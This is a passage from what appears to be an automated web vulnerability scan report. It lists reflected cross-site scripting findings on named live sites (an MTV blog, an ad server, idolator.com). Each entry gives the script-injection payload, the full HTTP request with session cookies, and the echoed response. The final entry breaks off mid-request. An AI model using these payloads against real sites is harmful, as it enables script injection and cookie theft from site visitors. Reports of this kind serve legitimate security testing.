4.131. http://hollywoodcrush.mtv.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://hollywoodcrush.mtv.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc7e</script><script>alert(1)</script>4e5acb99ae0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.ico4bc7e</script><script>alert(1)</script>4e5acb99ae0 HTTP/1.1
Host: hollywoodcrush.mtv.com
Proxy-Connection: keep-alive
Referer: http://moviesblog.mtv.com/2011/06/12/game-of-thrones-spoiler-death-sean-bean/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1864906649-1307963885068; mtvn_guid=1307963888-186; mbox=check#true#1307963954|session#1307963884869-321358#1307965754; __cs_rr=1

Response

HTTP/1.1 404 Not Found
Server: Apache/2
X-Powered-By: PHP/5.2.8
X-Pingback: http://hollywoodcrush.mtv.com/xmlrpc.php
Last-Modified: Mon, 13 Jun 2011 11:23:04 GMT
Pragma: no-cache
X-Cache-Term: short
Content-Type: text/html; charset=UTF-8
Content-Length: 28173
Cache-Control: must-revalidate, max-age=600
Expires: Mon, 13 Jun 2011 11:33:04 GMT
Date: Mon, 13 Jun 2011 11:23:04 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head
...[SNIP]...
<script type="text/javascript">
mtvn.btg.Controller.sendPageCall( {
    pageName: 'BLOGS/hollywoodcrush/favicon.ico4bc7e</script><script>alert(1)</script>4e5acb99ae0',
    channel: 'BLOGS',
    hier1: 'BLOGS/hollywoodcrush/favicon.ico4bc7e</script>
...[SNIP]...

4.132. http://ib.adnxs.com/ab [ccd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The value of the ccd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f62e6'-alert(1)-'6d4ad6d0366 was submitted in the ccd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ab?enc=9z3qr1e4EkD3PeqvV7gSQAAAAGBmZgJA9z3qr1e4EkD3PeqvV7gSQPrUl4kdQRoN_ayDGovBdy8O7vVNAAAAAIwuAAC1AAAANQEAAAIAAABnowUA0WMAAAEAAABVU0QAVVNEANQBPAAzC1gAZg8BAgUCAQQAAAAA_iM6CAAAAAA.&tt_code=vert-264&udj=uf%28%27a%27%2C+15288%2C+1307962894%29%3Buf%28%27r%27%2C+369511%2C+1307962894%29%3Bppv%2811776%2C+%27944138667005826298%27%2C+1307962894%2C+1310554894%2C+62058%2C+25553%29%3B&cnd=!lyFsawjq5AMQ58YWGAAg0ccBMAA4sxZAAEi1AlAAWABgVWgAcAJ49P0CgAFQiAHG5wKQAQGYAQGgAQOoAQOwAQG5AZDaLMJXuBJAwQGQ2izCV7gSQMkBCkQTNEFHAEDQAQDZAQAAAAAAAPA_4AEA&ccd=!fgW-Lgjq5AMQ58YWGNHHASAAf62e6'-alert(1)-'6d4ad6d0366&referrer=http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/&pp=TfXuDgADVm8K5X-LihNCfUBjKMj687om75Nzlg&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB5XEjDu71Te-sDYv_lQf9hM3QCO_675oCp537xBr7546PDAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi05ODUzNzg0NjA2NTUxMzk3sgEMc3BvcnRkZncuY29tugEJNDY4eDYwX2FzyAEJ2gFCaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvmAKyD8ACBMgCq4KlDuACAOoCD0ZhbnNpZGVkXzQ2OHg2MKgDAegDiALoA9Mp6AOCAugDtQj1AwAAAMTgBAGABsCL7IGHsaCMNQ%26num%3D1%26sig%3DAGiWqtwD3vBQX40UZMj4tjEt-VoEhYeEGQ%26client%3Dca-pub-9853784606551397%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; uuid2=3420415245200633085; anj=Kfw)k>Mwz%)J70wBHz-D7`qokXhj-@aM)mVXjqrslj5ft[)'1yw[xphJSdzG.TF)0F^A`]BqTl-AR6`*)JP0AKozxfQE4@ZTQjq]rNTTlKqs3KL4-O(L$OYY]n=Fu!v//qc@$i3nq2_[o`94GmWdO0Bz@eLc*.`71nO<Z_$Uxo7CpH?*'y[3gS*4MLCLAUc5@r?XLOuqcg3M`mO_*!5UYGU#5(`mbnnx=hxk+]^04kmIQ5/@lg3[`MT!_-w*dO:K^3w5%z!c>wK::6cWF*>:oKm$@GTp*rMP#jcMyL@J[#@Cw65Eqv_>#V3r[J%[*<nKa<)Dn:*DWFX/5bNa8/+1*a#%MWnd*jrwZ[1nMujHwh48)Z_%aTTSWZ1=0MnH*f'UZlnAC]m)AUJ1(vbuE)$j2*'0!a['V8vZ4ig*C97YN3(WOPh_iGuYQ!7TBWIbIoOd9wMWuHVt1.@*tY/VH(3_aDA)y3PeL%fXVg0G'DDqj$WKSBU(?m1yqaoI^uXpwU1I^tKHQr3H.(X_0cm=y<=oa6_f*J4o)vR.yk*^]OC7`ZJ_K6qd<*VTIw_U`OL)YNc')g%2>I5$1(o1ikX@zjIkO?y1qMGFZ!G1`I!!!!!

Response

4.133. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81d22'%3balert(1)//9572c2aecfb was submitted in the redir parameter. This input was echoed as 81d22';alert(1)//9572c2aecfb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=514&size=728x90&referrer=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert(document.cookie)-%25225958ea17fd2=1&inv_code=748066&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D728x90%26s%3D748066%26r%3D1%26_salt%3D1188639314%26u%3Dhttp%253A%252F%252Fthesouthern.com%252Fsports%252Fbasketball%252Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%253Fc03b0%252522-alert%2528document.cookie%2529-%2525225958ea17fd2%253D1%26u%3Dhttp%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball%2Farticle_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html%3Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D181d22'%3balert(1)//9572c2aecfb HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIImdYCEAoYBCAEKAQw0ICz7wQQ0ICz7wQYAw..; anj=Kfw)k>JS.m*cOUs+'x*9/fov!U?-XD/@T`Eo*G>j9p6Kr5j'_7CgzlO:Fvgpkp?4[v=vwq`X_dWeNwpF6L1pOp0@m=r]@w@qmB`wa.gANc?%+]4$8<B8`4]:lCT3*9!qMQcil4XYmQ8WsDzIs#O67VmMmo)bHHWI6ZNYX0a_OT4xLEJYuSASUz$!y`uCnDKOlRBQu-`F+^8q^'[id[S7lqL3SyxsCSr9%@'BHMj:vbN!%A^*8GRvRZzGKBXAg>XGd5%ZV[>#w8#[npwDqVVGb#*ghU%C%7=MVqC2pmBp[Pxux0V[OL(pbe9FyrT[y*nF0xYV^1(9^IA4Y5vQ.63A13Xwt4yzbGW.9sLBw[mW8s6J_PV-8*MjghNoq:MVp!i%g:7B+-LBCkWVYq_!7QJ2ltk?f[Ob[1Nft-Sn1ma>DD[PDURe)51Ox>N/si@JJM]yC]x.!/L]TZ*wZi@6w8U'aoF=ae0W!Uew.vN=.wG!rYe0n(oapLJIa%K^mCY1KfotBEb; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 14-Jun-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb142304=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIs34QChgBIAEoATCP5NfvBAoSCMmhAxAKGAMgAygDMIbl1-8EEIbl1-8EGAM.; path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb830492=![nC'kI/7Z208jSAtaS(d]iDt?enc=9inHZHH_8D_vYB_4c-XsPwAAAKCZmQFA72Af-HPl7D_2Kcdkcf_wPyux69QhF0By_ayDGovBdy-G8vVNAAAAAMf7BwACAgAANQEAAAIAAABqowUADB8BAAEAAABVU0QAVVNEANgCWgDwAgAAPRABAgUCAQUAAAAAzieUmQAAAAA.&tt_code=748066&udj=uf%28%27a%27%2C+15288%2C+1307964038%29%3Buf%28%27r%27%2C+369514%2C+1307964038%29%3Bppv%2811776%2C+%278232605552906842411%27%2C+1307964038%2C+1310556038%2C+62058%2C+73484%29%3B&cnd=!oyV-jgjq5AMQ6sYWGAAgjL4EMAA48AVAAEi1AlDH9x9YAGBVaABwBHgMgAGoAYgBAJABAZgBAaABA6gBA7ABAbkBAZauyHH_8D_BAQGWrshx__A_yQGI_C6Qt-feP9ABANkBAAAAAAAA8D_gAQA.&ccd=!NgVlLQjq5AMQ6sYWGIy-BCAA; path=/; expires=Tue, 14-Jun-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)k=m<8a)J710Kt5aQ:PPuz.Z_6mg=p)#A_CV1L8mL#XXrY@'%SJv4c_/-XRX^M#>#0@[1jepIJI6E8zF'H=%jtH^_1VW)f3]4l%1@Sm@vnGn?R**s'RplLm%kx_bK:q5l>ivpnm-LKN$GN@x+lNA5Cuikkj7sn9xm]`J=KC.=:^:VjY4M_zK72^kT0P8PJlB'gmMTqPZD]i:/2(LP@ZSDJtjsMnWaZ_[%R'BsAFw7w[MS41A09JtN^8-H_wg%57bUOx*lC*-725*??#YJ5eAI2^O^zte(BohUm_LMr!yNlWER*tFuZZq[XP'u*=#$sbT9ivHo^PgNdv*Cw-Ffdc^N3wB-0>@mKd%9Jc:3LoP*`5_626$/u@vn]fbDK5wJL9BA4*S9vZ986)u@Iw8?KjY+Vo97wwNlttsp@d_`YZx-4qr:P.brt+'Y$lt'L$Czp#-`/AY=zpFTmxS$35Me3n0^t?5IFGts<P[dM>5G@OLkg6>h$@H0nFCD5tbki%.rk04x9h/#MPo(n:.)#)rC^.#X4Vk2Pi!(!wv*jbFzW>a59$ZSM*M%mnE)@T+zK(ngDPUnQ*fT(7V]5/mJ`I5u-sA4+<`%@kF>`GsZzMR=VXcl7:@#pmk]F9Y$]JJ59?0*vMgv$u'Q.*M^5m8SJM3BW%w/); path=/; expires=Sun, 11-Sep-2011 11:20:38 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 13 Jun 2011 11:20:38 GMT
Content-Length: 640

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/imp?anmember=514&anprice=90&Z=728x90&s=748066&r=1&_salt=1188639314&u=http%3A%2F%2Fthesouthern.com%2Fsports%2Fbasketball
...[SNIP]...
Fc03b0%2522-alert%28document.cookie%29-%25225958ea17fd2%3D1&u=http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html?c03b0%22-alert(document.cookie)-%225958ea17fd2=181d22';alert(1)//9572c2aecfb">
...[SNIP]...

4.134. http://idolator.com/ifb/audience-science.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/ifb/audience-science.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c73f"><script>alert(1)</script>40fd068c3fa was submitted in the REST URL parameter 1. This input was echoed as 2c73f\"><script>alert(1)</script>40fd068c3fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ifb2c73f"><script>alert(1)</script>40fd068c3fa/audience-science.html HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c; __utmz=183537278.1307964748.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=183537278.928599552.1307964748.1307964748.1307964748.1; __utmc=183537278; __utmb=183537278.1.10.1307964748; VWCUKP300=L123100/Q72996_13937_1944_061311_1_070411_445236x444947x061311x1x1; SVWCUKP300=445236_1; __qca=P0-1567452271-1307964766769

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 35850
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/ifb2c73f\"><script>alert(1)</script>40fd068c3fa/audience-science.html" />
...[SNIP]...

4.135. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed9e7"><script>alert(1)</script>94f63fa15e9 was submitted in the REST URL parameter 1. This input was echoed as ed9e7\"><script>alert(1)</script>94f63fa15e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contented9e7"><script>alert(1)</script>94f63fa15e9/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:03 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:03 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-contented9e7\"><script>alert(1)</script>94f63fa15e9/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.136. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83a1b"><script>alert(1)</script>3876fc04fe was submitted in the REST URL parameter 2. This input was echoed as 83a1b\"><script>alert(1)</script>3876fc04fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins83a1b"><script>alert(1)</script>3876fc04fe/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:15 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:15 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36002
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins83a1b\"><script>alert(1)</script>3876fc04fe/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.137. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 619b8"><script>alert(1)</script>b699cc3cd3e was submitted in the REST URL parameter 3. This input was echoed as 619b8\"><script>alert(1)</script>b699cc3cd3e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets619b8"><script>alert(1)</script>b699cc3cd3e/js/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:24 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets619b8\"><script>alert(1)</script>b699cc3cd3e/js/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.138. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3319d"><script>alert(1)</script>8214a7bd60d was submitted in the REST URL parameter 4. This input was echoed as 3319d\"><script>alert(1)</script>8214a7bd60d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js3319d"><script>alert(1)</script>8214a7bd60d/ajaxupload.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:36 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js3319d\"><script>alert(1)</script>8214a7bd60d/ajaxupload.js?ver=2.8.6" />
...[SNIP]...

4.139. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b51b1"><script>alert(1)</script>fb71d8fe0e8 was submitted in the REST URL parameter 5. This input was echoed as b51b1\"><script>alert(1)</script>fb71d8fe0e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.jsb51b1"><script>alert(1)</script>fb71d8fe0e8?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=c489d4009ebc793736408e674190920c

Response

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:33:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Vary: Cookie,Accept-Encoding
X-Pingback: http://idolator.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 13 Jun 2011 04:33:47 -0700
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Cache-Control: max-age=300, must-revalidate
Content-Length: 36005
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/ajaxupload.jsb51b1\"><script>alert(1)</script>fb71d8fe0e8?ver=2.8.6" />
...[SNIP]...

4.140. http://idolator.com/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idolator.com
Path:	/wp-content/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed291"><script>alert(1)</script>a64e2c6bb6a was submitted in the REST URL parameter 1. This input was echoed as ed291\"><script>alert(1)</script>a64e2c6bb6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-contented291"><script>alert(1)</script>a64e2c6bb6a/plugins/buzzmedia-celeb-blogs-widgets/js/jcarousellite_1.0.1.min.js?ver=2.8.6 HTTP/1.1
Host: idolator.com
Proxy-Connection: keep-alive
Referer: http://idolator.com/wp-content2f889%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3Ed06b96a1bc7/themes/idolator_1.5/images/favicon.ico
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
